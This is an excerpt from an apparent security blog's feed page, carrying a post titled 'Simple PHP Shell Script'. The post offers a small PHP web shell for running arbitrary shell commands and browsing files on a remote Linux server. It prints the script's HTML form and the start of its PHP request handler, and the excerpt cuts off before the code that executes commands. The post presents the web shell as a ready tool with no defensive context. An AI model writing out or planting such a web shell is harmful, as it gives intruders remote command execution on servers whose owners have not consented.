Quantcast
Channel: Information Security Expert Blog »» Linux
Viewing all articles
Browse latest Browse all 4

Simple PHP Shell Script

$
0
0
Here is a simple PHP shell script which took less than 10 minutes to write. This tiny script lets you execute arbitrary shell commands or browse the filesystem on a remote Linux server. <HTML> <HEAD> <TITLE>Simple PHP Shell</TITLE> </HEAD> <BODY> <form action=”shell.php” method=post> <input type=”text” NAME=”c”/> <input name=”submit” type=submit value=”Command”> </FORM> <?php if(isset($_REQUEST[‘submit’])) { $c […]

Viewing all articles
Browse latest Browse all 4

Trending Articles